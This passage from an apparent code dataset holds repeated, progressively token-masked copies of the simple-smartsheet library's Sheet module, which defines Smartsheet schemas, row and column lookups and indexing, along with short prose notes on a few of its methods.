ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
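make_cells is the bulk counterpart of make_cell: it turns a {column title: value} mapping into a list of Cell objects, one per entry. A sketch with invented titles and values; the resulting cells would normally be attached to a Row before creating or updating rows through the API, which is outside this module:

# Hypothetical column titles and values.
cells = sheet.make_cells({
    "Full Name": "Bob Lee",
    "Email": "bob@example.com",
    "Birth Date": "1990-01-01",
})
# len(cells) == 3, each Cell already bound to the matching column ID.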
"<import token>\n<code token>\n<assignment token>\n\n\nclass UserSettingsSchema(Schema):\n <assignment token>\n <assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] 
= attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
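as_list flattens every Row into a plain {column title: cell value} dictionary via row.as_dict(), which is convenient for serialisation or quick inspection. A sketch of iterating over that view, assuming the same `sheet` object as before:

for record in sheet.as_list():
    # Each record maps column titles to float/str/datetime/None values.
    print(record)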
"<import token>\n<code token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n 
workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
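as_dataframe assembles a pandas DataFrame from row.as_series() calls; per its docstring, pandas must be installed separately or via the simple-smartsheet[pandas] extra. A sketch of the call, again assuming an existing `sheet`:

# Columns of the resulting frame include row id, row number and the sheet's columns.
df = sheet.as_dataframe()
print(df.head())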
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, 
RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
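The nested schemas in these entries (UserSettingsSchema, UserPermissionsSchema, WorkspaceSchema, SheetSchema) rely on marshmallow's data_key to translate Smartsheet's camelCase JSON keys into snake_case attributes. A standalone illustration of that mechanism using plain marshmallow; the class name UserSettingsSketch and the payload are made up, and this bypasses the library's own Schema subclass:

from marshmallow import Schema, fields

class UserSettingsSketch(Schema):
    critical_path_enabled = fields.Bool(data_key="criticalPathEnabled")
    display_summary_tasks = fields.Bool(data_key="displaySummaryTasks")

loaded = UserSettingsSketch().load(
    {"criticalPathEnabled": False, "displaySummaryTasks": True}
)
print(loaded)   # {'critical_path_enabled': False, 'display_summary_tasks': True}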
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass UserPermissionsSchema(Schema):\n <assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n 